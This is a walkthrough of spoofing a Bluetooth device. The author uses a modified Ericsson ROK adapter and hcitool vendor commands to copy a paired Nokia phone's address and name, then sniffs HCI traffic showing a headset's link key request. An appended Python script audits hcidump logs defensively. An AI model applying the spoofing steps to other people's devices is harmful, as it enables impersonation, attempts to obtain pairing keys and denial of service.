This is MY lovable pet ROK. My ROK loves my Jabra. My ROK is also quite fond of my Nokia phone.

Place a fresh battery in the Jabra headset.

threat:~# hcitool inq
Inquiring ...
        00:07:A4:95:28:E2       clock offset: 0x5f15    class: 0x200404
        00:60:57:DC:32:04       clock offset: 0x274e    class: 0x500204
threat:~# hcitool scan
Scanning ...
        00:07:A4:95:28:E2       Jabra BT110
        00:60:57:DC:32:04       Nokia 3660

Pair the Jabra with the Nokia phone. Use passcode 0000 and pairing will complete. Push the connect button on the Jabra. Accept the connection from the Nokia. The connection will quickly connect and disconnect. Disable Bluetooth on the Nokia, turn the phone off, or simply leave the area.

Verify installation of the Sexy ROK chip.

threat:~# lsusb
Bus 001 Device 002: ID 0bdb:1000 Ericsson Business Mobile Networks BV
Bus 001 Device 001: ID 0000:0000
threat:~# hciconfig
hci0:   Type: USB
        BD Address: 06:05:04:03:02:01 ACL MTU: 672:10 SCO MTU: 255:255
        UP RUNNING PSCAN ISCAN
        RX bytes:807 acl:0 sco:0 events:40 errors:0
        TX bytes:665 acl:0 sco:0 commands:35 errors:0

Give the pet ROK a new bdaddr.

threat:~# hcitool cmd 0x3f 0x00d 04 22 dc 57 60 00
< HCI Command: ogf 0x3f, ocf 0x000d, plen 6
  04 22 DC 57 60 00
> HCI Event: 0x0e plen 4
  01 0D FC 00

Write the bdaddr to the device.

threat:~# hcitool cmd 0x3f 0x022
< HCI Command: ogf 0x3f, ocf 0x0022, plen 0
> HCI Event: 0x0e plen 4
  01 22 FC 12

Cycle the device.

threat:~# hciconfig hci0 down; hciconfig hci0 up

Verify the address.

threat:~# hciconfig
hci0:   Type: USB
        BD Address: 00:60:57:DC:22:04 ACL MTU: 672:10 SCO MTU: 255:255
        UP RUNNING PSCAN ISCAN
        RX bytes:932 acl:0 sco:0 events:57 errors:0
        TX bytes:984 acl:0 sco:0 commands:52 errors:0

Borrow the handset's name.

threat:~# hciconfig hci0 name "Noika 3660"
threat:~# hciconfig hci0 name
hci0:   Type: USB
        BD Address: 00:60:57:DC:22:04 ACL MTU: 672:10 SCO MTU: 255:255
        Name: 'Noika 3660'

Using the above technique you can, under some circumstances, impersonate a trusted device. As you can see, we are able to have a bit of fun with this...

This is my Jabra thinking it is connecting to my phone. It is asking for the link key at this point. I wonder, if we pretend to be the Jabra, whether we can get the handset to send us the key by mimicking this request. This was caused by pressing the connect button on the handset.

threat:~# hcidump -x -V
HCI sniffer - Bluetooth packet analyzer ver 1.17
device: hci0 snap_len: 1028 filter: 0xffffffff
> HCI Event: Connect Request (0x04) plen 10
    bdaddr 00:07:A4:95:28:E2 class 0x20040c type ACL
< HCI Command: Accept Connection Request (0x01|0x0009) plen 7
    E2 28 95 A4 07 00 01
> HCI Event: Command Status (0x0f) plen 4
    Accept Connection Request (0x01|0x0009) status 0x00 ncmd 1
> HCI Event: Link Key Request (0x17) plen 6
    E2 28 95 A4 07 00

This is the connection the other way around. My 3660 thinks it is talking to my headset. I tell my Nokia handset to connect to the Jabra and I get the following sniff on my laptop.

HCI sniffer - Bluetooth packet analyzer ver 1.17
device: hci0 snap_len: 1028 filter: 0xffffffff
> HCI Event: Connect Request (0x04) plen 10
    bdaddr 00:60:57:DC:32:04 class 0x500204 type ACL
< HCI Command: Accept Connection Request (0x01|0x0009) plen 7
    04 32 DC 57 60 00 01
> HCI Event: Command Status (0x0f) plen 4
    Accept Connection Request (0x01|0x0009) status 0x00 ncmd 1
> HCI Event: Connect Complete (0x03) plen 11
    status 0x00 handle 1 bdaddr 00:60:57:DC:32:04 type ACL encrypt 0x00
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
    01 00 0F 00
> HCI Event: Command Complete (0x0e) plen 6
    Write Link Policy Settings (0x02|0x000d) ncmd 1
    01 01 00
< HCI Command: Change Connection Packet Type (0x01|0x000f) plen 4
    01 00 18 CC
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Connect req: psm 1 scid 0x0042
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Connect rsp: dcid 0x0040 scid 0x0042 result 0 status 0
      Connection successful
> HCI Event: Command Status (0x0f) plen 4
    Change Connection Packet Type (0x01|0x000f) status 0x00 ncmd 0
> HCI Event: Connection Packet Type Changed (0x1d) plen 5
    00 01 00 18 CC
> HCI Event: Command Complete (0x0e) plen 4
    Unknown (0x00|0x0000) ncmd 1
    00
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0040 flags 0x00 clen 0
< ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0042 flags 0x00 result 0 clen 0
      Success
< ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0042 flags 0x00 clen 0
> ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0040 flags 0x00 result 0 clen 0
      Success
> ACL data: handle 1 flags 0x02 dlen 17
    L2CAP(d): cid 0x0040 len 13 [psm 1]
        SDP SS Req: tid 0x1 len 0x8
          pat uuid-16 0x111e (Handsfree)
          max 65535
          cont 00
< ACL data: handle 1 flags 0x02 dlen 22
    L2CAP(d): cid 0x0042 len 18 [psm 1]
        SDP SS Rsp: tid 0x1 len 0xd
          count 2
          handles 0x10001 0x10002
          cont 00
> ACL data: handle 1 flags 0x02 dlen 21
    L2CAP(d): cid 0x0040 len 17 [psm 1]
        SDP SA Req: tid 0x2 len 0xc
          handle 0x10001
          max 1024
          aid(s) 0x0004 (ProtocolDescList)
          cont 00
< ACL data: handle 1 flags 0x02 dlen 31
    L2CAP(d): cid 0x0042 len 27 [psm 1]
        SDP SA Rsp: tid 0x2 len 0x16
          count 19
          aid 0x0004 (ProtocolDescList)
            < < uuid-16 0x0100 (L2CAP) > < uuid-16 0x0003 (RFCOMM) uint 0x3 > >
          cont 00
> HCI Event: Number of Completed Packets (0x13) plen 5
    01 01 00 05 00
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Connect req: psm 3 scid 0x0043
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Connect rsp: dcid 0x0041 scid 0x0043 result 0 status 0
      Connection successful
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Config req: dcid 0x0041 flags 0x00 clen 0
< ACL data: handle 1 flags 0x02 dlen 14
    L2CAP(s): Config rsp: scid 0x0043 flags 0x00 result 0 clen 0
      Success
< ACL data: handle 1 flags 0x02 dlen 16
    L2CAP(s): Config req: dcid 0x0043 flags 0x00 clen 4
      MTU 1024
> ACL data: handle 1 flags 0x02 dlen 18
    L2CAP(s): Config rsp: scid 0x0041 flags 0x00 result 0 clen 4
      Success
      MTU 1024
> ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0041 len 4 [psm 3]
      RFCOMM(s): SABM: cr 1 dlci 0 pf 1 ilen 0 fcs 0x1c
< ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0043 len 4 [psm 3]
      RFCOMM(s): UA: cr 1 dlci 0 pf 1 ilen 0 fcs 0xd7
> ACL data: handle 1 flags 0x02 dlen 18
    L2CAP(d): cid 0x0041 len 14 [psm 3]
      RFCOMM(s): PN CMD: cr 1 dlci 0 pf 0 ilen 10 fcs 0x70 mcc_len 8
      dlci 6 frame_type 0 credit_flow 15 pri 0 ack_timer 0
      frame_size 667 max_retrans 0 credits 3
< ACL data: handle 1 flags 0x02 dlen 8
    L2CAP(d): cid 0x0043 len 4 [psm 3]
      RFCOMM(s): DM: cr 1 dlci 6 pf 1 ilen 0 fcs 0xf9
> HCI Event: Number of Completed Packets (0x13) plen 5
    01 01 00 05 00
> ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Disconn req: dcid 0x0041 scid 0x0043
< ACL data: handle 1 flags 0x02 dlen 12
    L2CAP(s): Disconn rsp: dcid 0x0041 scid 0x0043

More to come... At the very least this can cause a DoS on some devices and loss of pairing on others.
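As an added example (not part of the original note), a small Python audit of an hcidump text log, written from the defender's side: it summarises, per peer address, the Connect Request, Link Key Request and Connect Complete events, whether the ACL link came up with encryption, and which RFCOMM channels the "headset" refused. The sample lines are re-typed from the traces above; the hcidump format is the only assumption.

```python
import re
from collections import defaultdict

# hcidump -x -V lines re-typed from the traces above (constructed sample, not a live capture).
SAMPLE = """\
> HCI Event: Connect Request (0x04) plen 10
bdaddr 00:07:A4:95:28:E2 class 0x20040c type ACL
> HCI Event: Link Key Request (0x17) plen 6
E2 28 95 A4 07 00
> HCI Event: Connect Request (0x04) plen 10
bdaddr 00:60:57:DC:32:04 class 0x500204 type ACL
> HCI Event: Connect Complete (0x03) plen 11
status 0x00 handle 1 bdaddr 00:60:57:DC:32:04 type ACL encrypt 0x00
> ACL data: handle 1 flags 0x02 dlen 12
L2CAP(s): Connect req: psm 3 scid 0x0043
< ACL data: handle 1 flags 0x02 dlen 8
L2CAP(d): cid 0x0043 len 4 [psm 3] RFCOMM(s): DM: cr 1 dlci 6 pf 1 ilen 0 fcs 0xf9
"""

def le_bdaddr(hexbytes):
    """Raw HCI parameters are printed in wire order; a bdaddr is little-endian."""
    return ":".join(reversed(hexbytes.upper().split()))

def audit(dump):
    """Summarise, per peer address, the events a defender wants to see in an HCI log."""
    peers = defaultdict(lambda: {"connect_req": 0, "link_key_req": 0,
                                 "unencrypted": 0, "rfcomm_refused": []})
    handles = {}                      # ACL handle -> peer bdaddr (from Connect Complete)
    lines = dump.splitlines()
    for line, nxt in zip(lines, lines[1:] + [""]):
        if "Connect Request" in line:
            m = re.search(r"bdaddr (\S+)", nxt)
            peers[m.group(1)]["connect_req"] += 1
        elif "Link Key Request" in line:
            peers[le_bdaddr(nxt)]["link_key_req"] += 1
        elif "Connect Complete" in line:
            m = re.search(r"handle (\d+) bdaddr (\S+) .* encrypt (0x[0-9a-f]+)", nxt)
            handles[m.group(1)] = m.group(2)
            if m.group(3) == "0x00":  # link came up without encryption
                peers[m.group(2)]["unencrypted"] += 1
        elif "ACL data" in line and "RFCOMM(s): DM:" in nxt:
            handle = re.search(r"handle (\d+)", line).group(1)
            dlci = int(re.search(r"dlci (\d+)", nxt).group(1))
            peers[handles.get(handle, "?")]["rfcomm_refused"].append(dlci)
    return dict(peers)

if __name__ == "__main__":
    for addr, info in audit(SAMPLE).items():
        print(addr, info)
```

The encrypt 0x00 in the Connect Complete is the field to watch; on a BlueZ host, hciconfig hci0 auth and hciconfig hci0 encrypt make the adapter require authentication and encryption for incoming links.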